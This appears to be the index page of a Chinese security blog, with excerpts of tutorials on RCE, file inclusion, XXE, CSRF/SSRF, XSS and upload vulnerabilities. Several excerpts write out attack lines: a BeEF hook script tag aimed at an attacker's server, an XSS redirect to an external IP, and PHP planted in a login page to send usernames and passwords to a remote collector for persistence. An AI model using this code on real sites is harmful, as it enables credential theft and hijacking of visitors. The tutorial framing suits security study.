矢幽武博客

总览知识点调用命令的漏洞：高危 1.为什么会产生此类安全问题2.此类安全问题探针利用及危害3.此类安全问题在CTF即CMS分析 漏洞场景：代码会调用自身的脚本代码执行，也会调用系统命令执行漏洞区别：脚本语言&操作系统(php/java/python/js&windows/linux/mac)漏洞对象：WEB源码&中间件&其他环境（见漏洞详情对象）漏洞危害：直接权限丢失,可执行任意脚本代码或系统命令 RCE-原理&探针&利用&危害等RCE 分为两类 RCE代码执行：引用脚本代码解析执行 把你接收过来的数据以当前脚本代码进行执行 将数据以代码进行执行eval('phpinfo();'); RCE命令执行：脚本调用操作系统命令 将数据以(系统命令)命令进行执行system('ls'); 和其它漏洞的区别：将字符串进行解析执行 危害：执行命令和代码。能读写文件。 黑盒探针RCE：难/几率小 大部分：基于白盒和网上爆出的RCE。 漏洞函数：★★★★★★1.PHP： 运行代码： ...

知识点(很难碰到)文件读取和文件下载：主要是获取网站敏感文件(对后期安全测试有所帮助)(数据库配置文件，接口配置文件，账户配置文件，操作系统敏感文件，口令密码等，网站自身的敏感文件)。 文件读取：基本和文件下载利用类似 文件下载：利用下载获取源码或数据库配置文件及系统敏感文件为后续出思路 直连下载：(没有安全问题)http://xxx.xxx.com/2.zip无法直连下载：http://xxx.xxx.com/index.php可能存在安全问题http://xxx.xxx.com/?down=1.zip代码使用下载协议尝试下载解析文件http://xxx.xxx.com/?down=index.php 文件删除：除自身安全引发的文件删除外，可配合删除重装锁定文件进行重装(高危操作，慎用。可以删除网站的锁定文件，重新安装网站。) ➢审计分析-文件下载-XHCMS-功能点➢审计分析-文件读取-MetInfo-函数搜索➢审计分析-文件删除-74CMS-函数搜索➢黑盒分析-下载读取-下载资源URL参数 白盒审计(XHCMS)文件下载下载漏洞 :=> 任意文件下载:下载谁 下 ...

总览过滤功能：1.嵌入式过滤或者单独写一个过滤文件2.过滤文件的代码共享和执行，一旦有变量则存在文件包含漏洞风险3.文件包含意味着执行，能正确执行PHP代码 核心知识： 本地包含LFI&远程包含RFI-区别 一个只能包含本地，一个可以远程加载 具体形成原因由代码和环境配置文件决定 各类脚本语言包含代码写法-见下文 <!--#include file="1.asp" --><!--#include file="top.aspx" --><c:import url="http://thief.one/1.jsp"><jsp:include page="head.jsp"/><%@ include file="head.jsp"%><?php Include('test.php')?> 各类脚本语言包含伪协议玩法 点我 php伪协议点我点我 见图 思路要点： 黑盒发现： 主要 ...

总览思路点：参考点我 XXE黑盒发现： 获取得到 Content-Type 或 数据类型为xml 时，尝试进行xml语言payload进行测试 不管获取的Content-Type类型或数据传输类型，均可尝试修改后提交测试xxe XXE不仅在数据传输上可能存在漏洞，同样在文件上传引用插件解析或预览也会造成文件中的XXE Payload被执行 XXE白盒发现：(前两点针对了大部分漏洞，但不能针对CSRF漏洞) 可通过 应用功能 追踪代码定位审计 可通过脚本 特定函数 搜索定位审计 可通过 伪协议玩法 绕过相关修复等 流程：客户端xml发送数据服务器xml解析数据 攻击方式：插入xml文件读取代码 白盒测试：查xml的操作函数和解析函数（比如PHP的）靠运气查XML在代码当中的位置：查注释 详细点：XML被设计为传输和存储数据，XML文档结构包括XML声明、DTD文档类型定义（可选）、文档元素，其焦点是数据的内容，其把数据从HTML分离，是独立于软件和硬件的信息传输工具。XXE漏洞全称XML External Entity Injection，即xml外部实体注入漏洞，XXE ...

总览知识点1、CSRF- 原理&危害&探针&利用等2、SSRF- 原理&危害&探针&利用等3、CSRF&SSRF- 黑盒下漏洞探针点 详细点–认知CSRF 概念CSRF全称：Cross- site request forgery，即，跨站请求伪造，也被称为 “One Click Attack” 或 “Session Riding”，通常缩写为CSRF或者XSRF，是一种对网站的恶意利用。 举个生活中的例子：就是某个人点了个奇怪的链接，自己什么也没输，但自己的qq号或其他的号就被盗了。即该攻击可以在 受害者不知情 的情况下 以受害者名义伪造请求 ， 执行恶意操作 ，具有很大的危害性。 CSRF的攻击前准备： 知道对方是谁（具体到哪个管理员） 对数据包构造进行复现（复现出添加管理员的数据包，使用OWASP-CSRFTester模拟导出数据包） 对方是否会访问这个地址（一访问即触发） CSRF的攻击过程两个条件： 目标用户已经登录了网站，能够执行网站的功能。(准备好操作的权限) 目标用户访问了攻击者构造的URL。(攻击者伪造数据包 ...

docker 安装beef首先，必须有docker环境作为支撑，然后： # docker安装docker pull janes/beef# docker运行beefdocker run --rm -p 3000:3000 janes/beef# 访问方法# 插入js，让目标客户端进行访问，实现客户机在我方服务器上线<script src="http://你的IP地址:3000/hook.js"></script># 我方访问服务器的办法http://你的IP地址:3000//ui/panel账密：beef beef 跨站实战：CTFShow-316~331绕过：各种过滤的解决办法 316-反射型-直接远程调用因为是比赛环境，服务器充当管理员，不用担心没管理者访问的问题在实际的生产场景当中必须把东西发送给生产的管理者并且被点击，才能生效。下面是一个简单的指向地址，需要在服务器自己准备一个接收文件，还是和上次那样，准备个接收即可。 <script>window.location.href='http://47.94.23 ...

XSS-后台植入Cookie&表单劫持(权限维持)权限维持，获取账密后，防止权限被杀掉后无法再次取得权限。 取得权限不一定后台就能登录后台能登录不一定是取得权限 条件：已取得相关web权限后 写入代码到登录成功文件(登录成功后的文件，里面的用户名和密码都是正确的，需要将正确的代码发送出来，可以使用js自动触发发送到远程地址进行处理)，利用beef或xss平台实时监控Cookie等凭据实现权限维持 实现下面成功页面账密劫持的案例的重要前提：改写/插入下面的语句到成功登录的那个文件夹的指定位置获取账密 # 写完后，在成功的页面被访问时会偷偷的触发$a = '<script src="http://xxx:80/get.php?username='.$用户名.'&pass='.$密码.'"></script>';echo $a; 远程可以这么写,把内容自动写入文件。 <?php$u = $_GET['username'];$p = $ ...

总览知识点：1、XSS跨站-原理&攻击&分类等2、XSS跨站-反射型&存储型&DOM型等3、XSS跨站-攻击手法&劫持&盗取凭据等4、XSS跨站-攻击项目&XSS平台&Beef-XSS 原理跨站点脚本攻击（前端漏洞，特征：输出特征） 指攻击者利用网站程序对用户输入过滤不足，输入可以显示在页面上对其他用户造成影响的HTML代码，从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。通过在用户端注入恶意的可执行脚本，若服务器对用户的输入不进行处理或处理不严，则浏览器就会直接执行用户注入的脚本。 数据交互的地方 get、post、headers 反馈与浏览 富文本编辑器 各类标签插入和自定义 数据输出的地方 用户资料 关键词、标签、说明 文件上传 XSS分类常见的三个XSS全依靠JS代码，权限较死。JS代码很隐蔽，能做的行为较少。获取COOKIE后，人家可以尝试上线你的设备，夺root。 反射型（非持久型）▍=> 漏洞属于一次性的,每次都需要自己构造好再去(自己/别人)进行请求正常 ...

总览知识点：1、白盒审计三要素2、黑盒审计四要素3、白黑测试流程思路 详细点：1、检测层面：前端，后端等2、检测内容：文件头，完整性，二次渲染等3、检测后缀：黑名单，白名单，MIME检测等4、绕过技巧：多后缀解析，截断，中间件特性，条件竞争等 本章课程内容：1、文件上传-CTF赛题知识点2、文件上传-中间件解析&编辑器安全3、文件上传-实例CMS文件上传安全分析 前置：后门代码需要用特定格式后缀解析，不能以图片后缀解析脚本后门代码(解析漏洞除外)如：jpg图片里面有php后门代码，不能被触发，所以连接不上后门如果要图片后缀解析脚本代码，一般会利用包含漏洞或解析漏洞，还有.user.ini&.htaccess 实践白盒审计-Finecms-代码常规-处理逻辑黑盒审计从用户中心处上传头像，发现数据包有如下数据 data%3Aimage%2Fjpeg%3Bbase64%2C%2F9j%2F4AAQSkZJRgABAQAAAQABAAD%2F%2FgAXR2VuZXJhdGVkIGJ5IFNuaXBhc3Rl%2F9sAhAAKBwcIBwYKCAgICwoKCw4YEA4ND ...

题外话说实在，这次确实是个意外……原本环境能在本地运行，但出现了一个意想不到的意外：靶场搭建完成后访问靶场时，靶场出现了访问页面错误的问题，也就是和原本预期的页面不一样。花费了大把时间意识到问题后，转到了线上搭建，简述下流程。 搭建流程为了方便搭建，这里采用阿里云的云ECS搭建。搭建基础环境选择Docker，剩下的搭建简单归结如下：记住!选择按量付费，用完就释放了，别浪费钱！(排除你特别有钱的情况……) 基础开发环境# 调用这个安装一个快捷安装包wget -O f8x https://raw.githubusercontent.com/ffffffff0x/f8x/main/f8x# 用法贴下面了：批量化安装使用 -b 选项安装基本环境 (gcc、make、git、vim、telnet、jq、unzip 等基本工具)使用 -p 选项安装代理环境 (警告:国外云服务器上不要用,会降速)使用 -d 选项安装开发环境 (python3、pip3、Go、Docker、Docker-Compose、SDKMAN)使用 -k 选项安装渗透环境 (hashcat、ffuf、OneForAll、k ...